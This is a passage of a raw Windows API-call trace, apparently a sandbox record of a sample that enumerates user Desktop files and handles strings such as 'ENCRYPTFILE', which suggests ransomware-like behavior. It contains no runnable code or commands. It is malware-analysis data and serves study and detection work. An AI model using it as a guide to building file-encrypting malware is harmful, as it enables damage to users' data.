nFileSizeHigh=0x0, nFileSizeLow=0x17606, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="g6f-14R3g3sZGYbIp.jpg", cAlternateFileName="G6F-14~1.JPG")) returned 0 [0132.281] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0132.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369e20 | out: hHeap=0x1780000) returned 1 [0132.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0132.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0132.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0132.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0132.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0132.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0132.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0132.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0132.281] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0132.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0132.281] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0132.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0132.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0132.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0132.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0132.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0132.281] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0132.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0132.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0132.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0132.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43150f0 | out: hHeap=0x1780000) returned 1 [0132.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0132.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0132.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0132.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0132.282] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0132.282] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0132.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0132.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0132.282] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0132.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0132.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0132.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0132.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2650 [0132.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0132.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0132.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0132.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0132.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0132.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0132.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0132.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0132.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0132.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0132.282] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0132.282] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0132.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0132.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf0) returned 0x4314838 [0132.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a240 | out: hHeap=0x1780000) returned 1 [0132.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0132.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0132.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0132.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0132.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5b0 [0132.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0132.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0132.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0132.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0132.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0132.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0132.283] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0132.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0132.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0132.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0132.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0132.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0132.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0132.283] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0132.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0132.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0132.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0132.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0132.283] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0132.283] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0132.283] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\Jk_T2yqTjjg2-B-HH.flv", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77d0c400, ftCreationTime.dwHighDateTime=0x1d5ebc6, ftLastAccessTime.dwLowDateTime=0x6603a40, ftLastAccessTime.dwHighDateTime=0x1d5eb48, ftLastWriteTime.dwLowDateTime=0x6603a40, ftLastWriteTime.dwHighDateTime=0x1d5eb48, nFileSizeHigh=0x0, nFileSizeLow=0x13c5b, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="Jk_T2yqTjjg2-B-HH.flv", cAlternateFileName="JK_T2Y~1.FLV")) returned 0x41ac200 [0132.284] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0132.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0132.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0132.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0132.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0132.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0132.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0132.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392180 [0132.284] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0132.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392180 | out: hHeap=0x1780000) returned 1 [0132.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0132.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0132.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25d0 [0132.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0132.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0132.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0132.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0132.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0132.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0132.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0132.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0132.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0132.284] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0132.284] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0132.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0132.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0132.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0132.285] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0132.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0132.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0132.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0132.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0132.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0132.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0132.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0132.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0132.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923e8 [0132.285] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0132.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923e8 | out: hHeap=0x1780000) returned 1 [0132.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0132.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0132.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26d0 [0132.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0132.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0132.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0132.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0132.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0132.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2710 [0132.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0132.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0132.285] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0132.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2610 [0132.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0132.285] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0132.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0132.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4d8 [0132.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0132.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0132.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0132.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0132.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0132.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0132.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0132.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0132.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0132.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0132.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0132.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0132.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0132.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0132.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0132.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0132.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0132.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0132.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0132.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0132.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0132.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0132.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0132.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0132.286] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0132.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0132.286] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0132.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0132.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0132.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392110 [0132.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0132.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0132.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0132.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0132.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0132.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0132.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0132.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0132.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0132.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0132.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0132.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0132.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0132.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0132.287] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0132.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0132.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0132.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0132.287] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0132.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0132.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0132.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0132.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0132.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0132.287] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0132.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0132.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0132.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0132.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0132.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0132.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0132.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0132.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0132.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0132.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0132.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0132.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0132.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0132.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0132.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0132.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0132.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0132.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0132.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0132.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0132.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0132.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0132.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0132.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0132.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0132.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0132.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0132.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0132.288] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0132.288] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0132.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0132.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0132.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0132.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0132.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0132.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0132.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0132.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0132.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0132.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0132.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0132.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0132.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0132.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0132.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0132.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0132.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0132.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0132.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0132.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0132.289] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0132.289] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 